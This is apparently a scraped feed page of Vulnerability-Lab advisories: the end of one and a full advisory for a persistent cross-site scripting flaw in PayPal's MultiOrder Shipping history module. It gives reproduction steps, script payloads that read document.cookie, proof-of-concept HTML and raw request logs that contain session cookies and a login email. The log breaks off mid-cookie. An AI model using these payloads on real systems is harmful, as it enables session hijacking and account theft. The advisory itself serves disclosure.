      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      status[200]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]


Reference(s):
https://www.bookfresh.com/cindex.php
https://www.bookfresh.com/cindex.php/backbone_api/clients/
https://www.bookfresh.com/cindex.php/backbone_api/clients/find?query=&offset=0
https://www.bookfresh.com/cindex.php/backbone_api/clients/9f29673d878097fd23de3bae1523da44


Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure restriction to the input of special chars or script code tags. Parse and encode the vulnerable from, phone and message input in the clients invite module to prevent persistent script code execution attacks through service notification mails.


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the web-server mail db encode is estimated as medium (CVSS 3.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
Search

PayPal Inc BugBounty #107 MultiOrder Shipping (API) - Persistent History Vulnerability

November 7, 2014, 5:41 am
$
0
0
Document Title:
===============
PayPal Inc BugBounty #107 MultiOrder Shipping (API) - Persistent History Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1048

PayPal Security UID:  dq115aYq


Release Date:
=============
2014-10-27


Vulnerability Laboratory ID (VL-ID):
====================================
1048


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally,
a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some
time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined
spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified
funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy
(for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your
PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary
funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it
charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency
used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account
type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United
States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale,
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation
for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official PayPal Inc (Core & API) Shipping Application.


Vulnerability Disclosure Timeline:
==================================
2014-10-27:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
PayPal Inc
Product: Shipping & MOS Application - API 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official PayPal Inc (Core & API) MultiOrder Shipping Web-Application. The vulnerability allows remote attackers to inject own malicious script codes to the application-side with persistent attack vector.

The persistent vulnerability is located in the `history` (activity) module of the multiorder shipping application api. Remote attackers are able to evade the filter of the api by using a manipulated tracking information value. The injection request runs through the main include of the multiorder shipping tracking details input field. After the local inject via POST method request to the own profile, the attacker needs to interact with the manipulated data. The injected script code executes in the history module of the local user [attacker] (multi user account) but also in the history module of another client (remote). The code execution occurs only by a check of the history when processing to request via GET the vulnerable saved item. The execution directly occurs on review of the full history on both client-side ends. The vulnerability is located on the application-side of the service with persistent attack vector and the request method to inject is POST.

Local
The vulnerability is exploitable for stand alone user accounts (locally) but also for multi-accounts in paypal via multiorder shipping service. The way of exploitation is remote and the risk is medium because of the following scenario. A remote attacker is able to create multiple customer orders
with injected payloads in the tracking information value. When the admin merchant account user logs in and checks the Paypal Multi Online Shipping Orders, the exploit gets triggered. On interaction with a manipulated tracking id the script code executes at another profile because of the saved merged information through the portal service.

Remote
The vulnerability is exploitable for stand alone user accounts in connection with another shipping user  (remotly) to interact. On interaction with another paypal api shipping user the request can be saved persistent to the another users accounts history. The payload will be injected like regular to the history information (tracking information) and during the exploitation phase the same entry becomes visible for the other users account in the same module. To successful trigger to exploit the issue it is required to wait after the information has been stored during the interact with a target user to see the case in the history (monthly) of the attacker and the other users account.

The security risk of the filter bypass and application-side input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9. Exploitation of the persistent web vulnerability requires a low privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicous script codes or persistent web module context manipulation.


Vulnerable Service(s):
[+] Paypal Inc - PayPal MultiOrder Shipping Application (Core & API)

Vulnerable Module(s):
[+] History

Vulnerable Parameter(s):
[+] id tracking

Affected Module(s):
[+] History Listing - Tracking
[+] History Sidebar Details – Tracking


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privilege paypal web-application user account and with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the security vulnerability in a local paypal account with multi user access privileges and remotly by event interaction.

1. Register a Paypal US Account and login as regular user after the verification process
2. Click in the main menu the tools button and scroll down to the multiorder shipping web-application
3. Login and switch to the pickup profile
4. Include the payload inside of the tracking value and save the data
5. Interact with the details with another client/user by an event
Note: Wait some time to get the context listed as item in the history module
6. Open the history listing tab and click the search form
7. Search for the date (event) were item interaction with another client has been happened ago
Note: The execution occurs also in the attacker account locally when processing to review the malicious item through the history.
8. The injected payload (script code) executes in the main list of the history item results and also in the right sidebar through the dbms stored tracking id value
Note: After the interaction the other client user of paypal needs to review the history module only with all results to execute the code remotly (with interaction).
9. Successful reproduce of the security vulnerability the other client only needs to interact by watching the history event listing!

Payload(s):
>"%20<iframe src="x/a_003.txt" onload="alert('POC-BENJAMIN!')[PERSISTENT INJECTED SCRIPT CODE!]">
<%20>"<iframe src=http://www.vuln-lab.com onload="alert(document.cookie)[PERSISTENT INJECTED CODE!]">

Note: The payload does not execute the code in the main index after the fix and patch of paypal. Only the history module executes the context when the item gets listed as result in the bottom context listing. The issue can be exploited locally for multi user accounts or remotly by interaction through the vulnerbale history (tracking id) module.

PoC Code: Details - Tracking# in the History Module Item List

<div class="psSideBar" id="HistoryDetails"><div class="psSideBarHeader" id="HistoryDetails_header">
<img title="Minimize this section" class="psSideBarMinIcon" src="shipping/images/psside_min.gif" id="HistoryDetails_min">
<img title="Maximize this section" class="psSideBarMaxIcon" src="shipping/images/psside_max.gif" id="HistoryDetails_max">
<span class="psSideBarTitle" id="HistoryDetails_title">Details</span></div><div class="psSideBarContent"
id="HistoryDetails_content"><div class="psSideFrame" id="SideHistoryCarrier"><div class="psSideFrameHeader"
id="SideHistoryCarrier_header"><a title="" class="psSideFrameButton" id="SideHistoryDetailsBtn" href="javascript:
psPushButton_OnLink('SideHistoryDetailsBtn');"><span class="psSideFrameButtonText" id="SideHistoryDetailsBtn_text">
details...</span></a><a title="" class="psSideFrameButton" id="SideHistoryScheduleBtn" href="javascript:
psPushButton_OnLink('SideHistoryScheduleBtn');"><span class="psSideFrameButtonText" id="SideHistoryScheduleBtn_text">
schedule...</span></a><a title="" class="psSideFrameButton" id="SideHistoryCancelBtn" href="javascript:
psPushButton_OnLink('SideHistoryCancelBtn');"><span class="psSideFrameButtonText" id="SideHistoryCancelBtn_text">
cancel</span></a><span class="psSideFrameTitle" id="SideHistoryCarrier_title">Carrier Pickup™</span></div>
<div class="psSideFrameContent" id="SideHistoryCarrier_content" style="display: block;">
        <div style="display: block;" id="SideHistNoPickups">No Carrier Pickups™ scheduled.</div>
        <div id="SideHistPickupList" style="display: none"></div>
</div></div><div class="psSideFrame" id="SideHistoryBatch"><div class="psSideFrameHeader" id="SideHistoryBatch_header">
<a title="" class="psSideFrameButton" id="SideHistoryBatchBtn" href="javascript: psPushButton_OnLink('SideHistoryBatchBtn');">
<span class="psSideFrameButtonText" id="SideHistoryBatchBtn_text">details...</span></a><span class="psSideFrameTitle"
id="SideHistoryBatch_title">Transaction Details</span></div><div class="psSideFrameContent" id="SideHistoryBatch_content"
style="display: block;">
        BATCH INFO HERE
</div></div><div class="psSideFrame" id="SideHistoryPrintedLabel"><div class="psSideFrameHeader"
id="SideHistoryPrintedLabel_header"><a title="" class="psSideFrameButton" id="SideHistoryPrintedLabelBtn"
href="javascript: psPushButton_OnLink('SideHistoryPrintedLabelBtn');"><span class="psSideFrameButtonText" id="SideHistoryPrintedLabelBtn_text">details...</span></a><span class="psSideFrameTitle"
id="SideHistoryPrintedLabel_title">Label Details</span></div><div class="psSideFrameContent"
id="SideHistoryPrintedLabel_content" style="display: block;">
        PRINTED LABEL INFO HERE
</div></div><div class="psSideFrame" id="SideHistoryManual"><div class="psSideFrameHeader"
id="SideHistoryManual_header"><span class="psSideFrameTitle" id="SideHistoryManual_title">
Shipment Details</span></div><div class="psSideFrameContent" id="SideHistoryManual_content"
style="display: block;"><table>
<tbody><tr><td colspan="2">Date: 2013/08/05</td></tr>
<tr><td colspan="2"> </td></tr>
<tr><td colspan="2">Shipped via: Other</td></tr>
<tr><td colspan="2">Tracking #: <iframe src="x/a_003.txt" onload="alert('POC-BENJAMIN!')[PERSISTENT INJECTED SCRIPT CODE!]"></td></tr>
</table>
<table><br>
<tr><td
 valign=top>Ship To:</td><td>POC
POC1<br>poc<br>poc<br>alskaf, AK
44332</td></tr>
<tr><td valign=top>Ship
From:</td><td>"/><br>"/>a%20/>"><img
 src="t.png"
onerror=prompt(document.cookie)></img>

Note: The red highlighted text in the poc source code shows the were the application-side script code execution takes place. The orange highlighted text shows the date and the module context of the affected vulnerable service.

PoC Code: Tracking# Listing - History Index

<div style="overflow: scroll; height: 131px; display: block;" class="psTableContent"
id="HistoryListTable_content"><div style="display: none;" class="psTableContentMsg">Loading order data...</div><table class="psTableList" id="HistoryListTable_table"cellspacing="1"> <tbody><tr class="psTableListRowSelected" id="undefined_row_0"><td class="psTableListCell" style="width: 25%;" id="undefined_row_0_cell_0">POC POC1</td><td class="psTableListCell" style="width: 15%;" id="undefined_row_0_cell_1">Other</td><td class="psTableListCell" style="width: 30%;" id="undefined_row_0_cell_2"><iframe src="PayPal%20Multi%20Order%20Shipping_files/a_003.txt" onload="alert('POC-NEW-BEN')"></iframe></td>
Note: The red marked text shows the script code payload after the inject via POST method request. During the evade of the filter by the input the vulnerable tracking id value manipulates the main history module item listing. The orange marked text shows the context next to the execution.
--- PoC Session Logs [GET] (Request & Execution) ---

1:35:52.538[922ms][total 922ms] Status: 200[OK]
POST https://ship.paypal.com/cgi-bin/shipweb?cmd=get-scheduled-carrier-pickups Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Content Size[-1] Mime Type[text/xml]
Request Headers:
Host[ship.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[text/xml; charset=UTF-8]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
Content-Length[138]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=kI12EvI4jupBZoWIECOc9T4DAgMQztXQvuEEXvgXYkp2uw3ZrcIHKucoZju8qBoJzw-tZeo3uRj_beoTkd3nUck2FvyQPb2kiSMwDHjyBuuidDEd; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   Post Data:
      POST_DATA[</GetScheduledCarrierPickups>]
   Response Headers:
      Date[Wed, 14 Aug 2013 23:35:55 GMT]
      Server[Apache]
      X-Frame-Options[SAMEORIGIN]
      Set-Cookie[RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; domain=.paypal.com; path=/; Secure; HttpOnly]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/xml]

Note: The first request shows how the researcher moved through the pickup module to the vulnerable history module in the paypal multiorder shipping web-application.

1:35:55.409[0ms][total 0ms] Status: pending[]
GET https://ship.paypal.com/powership/a Load Flags[LOAD_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[ship.paypal.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; HaC80bwXscjqZ7KM6VOxULOB534=ORfX9pdr8ftxc9NyP0TmSJ4B0lSthjOGQCC5APAR7e1eNqnk3WEWcoW8m47mGv-qtCkk_wxTnj2is1B5e2-Kr7_w3FTcxxijAdsyOnXSSh1GN9RvhP0tzJDAlTj7PoC-ZLBPhm; jYNTsouSlksxSbcE1jOBQOPko-K=sIIguAH9hGChn9skMeEk7kMAkbh8NnJGw8uw8Gg2cZDW6RY7p-DHlKFuzzCbwR051WG-vanSiKwnmGt63ezy4id7zhoqSUf-VzVZlUp6Zfj35mOgidWjeovRZ-ndsuIoK4qrVW; ppip_signup=; SEGM=bRdV1vB0ebq9RKdAb3xSHowCi6QnnlCiDOLNk8i1mAuLl1vTbzHQwWajSsMe8mvoWiJtY1GnpzN4Y-sixGy7BQ; upct=15; INSIDE_SEARCH_PARAMS=2%3bUS%3ben_US%3bAmerica%2fLos_Angeles; cookie_nav_is_vt_enabled=; cookie_nav_is_uum_enabled=; cookie_welcome=; Apache=10.73.8.155.1376519954817747; RouxWyWiKm3aD3COV0dah-P3yUq=egmP00IA-qk9vuZsjh7DQl8cgxlHKgmoe8i9E323Bp-MpImnx6YHKCB3RXYixNeq7NxdVj9wydXvLMRdleCmTq1OOzw2kpJMwWQObX6lH1RzNcFO; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=ExithdDwKWz2dQXDOUpwmT5khkaByIdeEGJLVsUwz0C7RLrkNi0ZTwwGipIxnBOMQ7IGJ9Akad32iNodKX64o4NdAewdQ4hnP3kq7EKeWoVcnCKix2ChNzbGDpxuCflcnu9uqvlJ1GMvnQeFOkz6SGALAhRX0dEmUlkZcGzrOAxxEik2vbP3V4zy_CbX7dlJtMuChya0ADSViy6T81gqqUicZR8ym8QOfnZP52T1we9-uCQDRLC5pLDMX4iCwJYIVi-Krevn3G7vtlqmn6iSvQDMGnZ-T5y0WwHMg18_5SL3yqerMBwDZrMEUi0VhZg8kVcRlXzvh_0BHai4RNmySI382ToAbAjCKp0K-0; SPARTAJSESSIONID=c133ecf12eeb1]

Note: The request log above shows the pending request of the proof of concept.

1:35:55.409[0ms][total 0ms] Status: 200[OK]
GET https://ship.paypal.com/powership/a Load Flags[LOAD_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
   Request Headers:
      Host[ship.paypal.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
Referer[https://ship.paypal.com/powership/powership.html?account_number=MBYAX9TQRRXHL]
      Cookie[cwrClyrK4LoCV1fydGbAxiNL6iG=QRBegh2GXJP8UDiCl4vZSNBVWkzTJ5P4YpVgyX4PD9diBigiWteJXVFgYZfEUU1Dykn9t2rpiy0mk1uTcFZWCrQner8nayt7nbpFtxSV1h79WsDQ2xr4TTXIWt0MwpwuN0BU8JGGaeZGrEsdQq8azuaOzIYai_nlt3XZUWSaoXoGRKSaVWGt8RwDbTe-C3wbY9UIviFx2fF20-E9jBwyttVHCNXUvwg_f9v4bK9QJaoEKvi8-CiUQ3Ax9XMsOXSyhv8eGeG7F65MhBuI-9WCufs3_mF8p3wrFb6tatV6ibdxMl17cbTut17A4QwHlX-7phA9vex4fTXwQeqxIIeJru8k4BAdvwCCS-lpYvX7d54qu1GOjheE_qBVtmfGTJIJ2fHSvO5P-C7d_mNAnwA9COYupjN0R6Bf_zhzs8VMY502LbdyVVyCMXlcWIC; KHcl0EuY7AKSMgfvHl7J5E7hPtK=AAYtfgjqYXUmXeBo_oz2EpePBdwSatwwy2CA184Libq2eyMDaPF2NFm02hPAZAYfgQgjv4oeKHQdCBCQ; cookie_check=yes; X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D185732178; LANG=en_US%3bUS; consumer_display=USER_HOMEPAGE%3d3%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1%26HOME_VERSION%3d1376606276%26FORGOT_BUTTON_ROLE%3d16%26MCE2_ELIGIBILITY%3d2; navcmd=_bulk-ship; navlns=0.0; analytics=uY9I5yYFaS2U.GDQdOTqoE7rLjUprdOGgCHmS.sSPwgptDi1d3j1aQdX.aNPOOp6YGdk3L-9UHQ; SPARTAJSESSIONIDV2=SjWCjq.bmIQPp4lU6PMKQ-xaFh9yTQf-huHCfmsDTrsZbaBzqjQ5osmbJd4HyDYLvVVLg8B1YPkZB0GuBiS9ldzkt-2vmFZAZeH5vFRAvlZiMR8xWnNfkA; s_sess=%20s_cc%3Dtrue%3B%20v31%3Dxpt%252FShipping%252Fshipping%252FLanding%253A%253A_bulk-ship%3B%20s_ppv%3D0%3B%20tr_p1%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%3B%20lt%3D%3B%20s_sq%3D%3B; s_pers=%20s_fid%3D0E94D5F4B2D9C710-2941E70654B1C499%7C1439594764938%3B%20gpv_c43%3Dxpt%252Fshipping%252Fshipping%252Flanding%253A%253A_bulk-ship%7C1376524564942%3B%20gpv_events%3Dno%2520value%7C1376524564958%3B; ts=vreXpYrS%3D1471193544%26vteXpYrS%3D1376524567%26vr%3D7efa72b41400a491aca05620fffe18d7%26vt%3D7f2278ae1400a4a1c556caf6ff6fb603; login_email=ateeq%40ccure.it; flow_back_cookie=; O5UEnqRkQisOp58l8Yil9bzRrxm=; X-PP-K=1376519887:2:NA; 